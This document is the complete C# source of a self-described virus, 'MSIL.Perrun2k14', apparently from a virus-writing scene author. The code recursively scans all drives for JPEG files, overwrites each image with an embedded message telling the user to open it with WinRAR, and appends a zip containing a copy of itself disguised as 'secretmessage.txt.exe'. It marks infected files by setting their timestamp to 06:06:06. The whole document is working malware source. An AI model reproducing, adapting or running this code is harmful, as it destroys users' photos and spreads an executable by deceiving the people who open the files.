// MSIL.Perrun2k14 by alcopaul [b8] // // This virus infects jpeg files. This will modify the jpeg to include a social engineering message that will instruct the user to open the infected file // with winrar. And upon using winrar, the executable is seen, ready to be executed by the user. // // http://www.twitter.com/thealcopaul // using System; using System.IO; using System.IO.Packaging; using System.Reflection; using System.Drawing; using System.Drawing.Imaging; using System.Text; namespace ConsoleApplication4 { class Program { private static string zipfile = ""; private static byte[] picbyte = Convert.FromBase64String("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"); static void Main(string[] args) { Module gxc = Assembly.GetExecutingAssembly().GetModules()[0]; string self = gxc.FullyQualifiedName; string currLoc = Path.GetDirectoryName(self); try { zipfile = PrepareZip(currLoc, self); } catch { } byte[] zippedbyte = File.ReadAllBytes(zipfile); Stream s = new MemoryStream(picbyte); Image ghostImg = Image.FromStream(s); foreach (DriveInfo driveInfo in DriveInfo.GetDrives()) { if (driveInfo.IsReady) { string glen = driveInfo.RootDirectory.FullName; DirectoryInfo dirx = new DirectoryInfo(@glen); AndLetsRock(dirx, ghostImg, zippedbyte); } } ghostImg.Dispose(); s.Close(); File.Delete(zipfile); } private static void AndLetsRock(DirectoryInfo dir, Image lol, byte[] kkk) { FileInfo[] filesx = dir.GetFiles("*.jpg"); foreach (FileInfo filex in filesx) { string filenamex = filex.FullName; try { if (filex.LastWriteTime.Hour.ToString() + filex.LastWriteTime.Minute.ToString() + filex.LastWriteTime.Second.ToString() == "666") { continue; } else { try { jpeginfect(filenamex, lol, kkk); } catch { continue; } } } catch { continue; } } DirectoryInfo[] dirs = dir.GetDirectories("*.*"); foreach (DirectoryInfo xdir in dirs) { try { AndLetsRock(xdir, lol, kkk); } catch { continue; } } } private static string PrepareZip(string dir, string self) { string ranname = dir + "\\" + Path.GetRandomFileName() + ".zip"; Package objZip = ZipPackage.Open(ranname, FileMode.OpenOrCreate, FileAccess.ReadWrite); Module gxc = Assembly.GetExecutingAssembly().GetModules()[0]; string odtx = gxc.FullyQualifiedName; Uri g = new Uri("/secretmessage.txt.exe", UriKind.Relative); if (objZip.PartExists(g) == false) { PackagePart pkgPart = objZip.CreatePart(g, System.Net.Mime.MediaTypeNames.Application.Octet, CompressionOption.Maximum); byte[] bg = File.ReadAllBytes(self); pkgPart.GetStream().Write(bg, 0, bg.Length); } objZip.Close(); return ranname; } public static void WriteX(FileStream s, byte[] g, byte[] k) { BinaryWriter w = new BinaryWriter(s); w.BaseStream.Seek(0, SeekOrigin.Begin); w.Write(g); w.Write(k); w.Flush(); w.Close(); } private static void jpeginfect(string fname, Image bg, byte[] zipbyte) { Image backImg = Image.FromFile(fname); Graphics g = Graphics.FromImage(backImg); MemoryStream fsm = new MemoryStream(); g.DrawImage(bg, 0, 0); backImg.Save(fsm, ImageFormat.Jpeg); g.Dispose(); backImg.Dispose(); FileStream outStream = File.OpenWrite(fname); fsm.WriteTo(outStream); outStream.Flush(); outStream.Close(); fsm.Close(); byte[] modjpg = File.ReadAllBytes(fname); FileStream lll = new FileStream(fname, FileMode.OpenOrCreate, FileAccess.ReadWrite); WriteX(lll, modjpg, zipbyte); lll.Close(); File.SetLastWriteTime(fname, new DateTime(DateTime.Now.Year, DateTime.Now.Month, DateTime.Now.Day, 6, 6, 6)); } } }